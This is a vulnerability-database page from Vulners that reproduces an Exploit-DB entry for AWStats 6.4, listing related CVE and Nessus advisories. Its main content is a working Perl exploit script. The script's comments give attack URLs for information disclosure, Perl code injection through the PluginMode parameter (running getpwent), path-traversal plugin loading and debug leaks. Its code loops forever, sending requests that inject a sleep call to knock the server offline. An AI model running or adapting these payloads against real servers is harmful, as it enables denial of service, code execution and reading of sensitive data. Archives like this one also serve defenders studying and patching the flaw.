Lucene search
+L

AWStats 6.4 - Denial of Service

🗓️ 14 Feb 2005 00:00:00Reported by GHCType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 81 Views

Denial of Service in AWStats 6.4 allows exploitation through sensitive data access and plugins.

Related
Code
ReporterTitlePublishedViews
Family
nessus
Tenable Nessus
AWStats Multiple Remote Vulnerabilities (Cmd Exec, Traversal, ID)
14 Feb 200500:00
nessus
nessus
Tenable Nessus
Debian DSA-682-1 : awstats - missing input sanitizing
16 Feb 200500:00
nessus
nessus
Tenable Nessus
FreeBSD : awstats -- arbitrary command execution (fdad8a87-7f94-11d9-a9e7-0001020eed82)
13 Jul 200500:00
nessus
checkpoint_advisories
Check Point Advisories
AWStats rawlog Plugin File Information Disclosure - Ver2 (CVE-2005-0435)
31 Mar 201400:00
checkpoint_advisories
cve
CVE
CVE-2005-0435
15 Feb 200505:00
cve
cve
CVE
CVE-2005-0436
15 Feb 200505:00
cve
cvelist
Cvelist
CVE-2005-0435
15 Feb 200505:00
cvelist
cvelist
Cvelist
CVE-2005-0436
15 Feb 200505:00
cvelist
debiancve
Debian CVE
CVE-2005-0435
15 Feb 200505:00
debiancve
debiancve
Debian CVE
CVE-2005-0436
15 Feb 200505:00
debiancve
Rows per page
#!/usr/bin/perl
#
#
# Summarized the advisory www.ghc.ru GHC: /str0ke
#
# [0] Exploitable example (raw log plugin):
#    Attacker can read sensitive information
#
# http://server/cgi-bin/awstats-6.4/awstats.pl?pluginmode=rawlog&loadplugin=rawlog
#
# [1] Perl code execution. (This script)
#
# http://server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+getpwent
#
# [2] Arbitrary plugin including.
#
# http://server/cgi-bin/awstats-6.4/awstats.pl?&loadplugin=../../../../usr/libdata/perl/5.00503/blib
#
# [3] Sensetive information leak in AWStats version 6.3(Stable) - 6.4(Development).
#    Every user can access debug function:
#
# http://server/cgi-bin/awstats-6.4/awstats.pl?debug=1
# http://server/cgi-bin/awstats-6.4/awstats.pl?debug=2
#
# Be sure to change the $server + /cgi-bin location /str0ke
#

use IO::Socket;
$server = 'www.example.com';
sub ConnectServer {
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80")
|| die "Error\n";
print $socket "GET /cgi-bin/awstats-6.4/awstats.pl?&hack=$rp&PluginMode=:sleep HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "\n\n";
}

while () {
$rp = rand;
&ConnectServer;
}

# milw0rm.com [2005-02-14]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 Feb 2005 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.07365
81